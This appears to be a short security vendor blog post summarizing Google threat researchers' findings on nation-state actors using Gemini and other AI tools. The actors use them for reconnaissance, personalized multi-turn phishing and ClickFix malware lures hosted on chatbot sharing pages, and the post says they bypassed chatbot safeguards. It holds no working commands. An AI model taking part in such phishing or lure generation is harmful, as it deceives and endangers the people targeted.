Researchers at Google’s Threat Intelligence Group (GTIG) warn that nation-state threat actors have adopted Gemini and other AI tools as essential components of their operations. The threat actors are using tools to conduct research and reconnaissance, target victims, and rapidly create phishing lures.
“Increasingly, threat actors now leverage LLMs to generate hyper-personalized, culturally nuanced lures that can mirror the professional tone of a target organization or local language,” the researchers write.
“This capability extends beyond simple email generation into ‘rapport-building phishing,’ where models are used to maintain multi-turn, believable conversations with victims to build trust before a malicious payload is ever delivered. By lowering the barrier to entry for non-native speakers and automating the creation of high-quality content, adversaries can largely erase those "tells" and improve the effectiveness of their social engineering efforts.”
Threat actors also abused a wide range of AI tools to host malicious commands for ClickFix social engineering attacks. The attackers bypassed safety guardrails used by ChatGPT, CoPilot, DeepSeek, Gemini, Grok, and others.
“While not a new malware technique, GTIG observed instances in which threat actors abused the public's trust in generative AI services to attempt to deliver malware,” the researchers write. “GTIG identified a novel campaign where threat actors are leveraging the public sharing feature of generative AI services, including Gemini, to host deceptive social engineering content."
“This activity, first observed in early December 2025, attempts to trick users into installing malware via the well-established "ClickFix" technique. This ClickFix technique is used to socially engineer users to copy and paste a malicious command into the command terminal.”
AI-powered security awareness training can give your organization an essential layer of defense against social engineering attacks. KnowBe4 empowers your workforce to make smarter security decisions every day. Over 70,000 organizations worldwide trust the KnowBe4 HRM+ platform to strengthen their security culture and reduce human risk.
Google has the story.
Here's how it works:
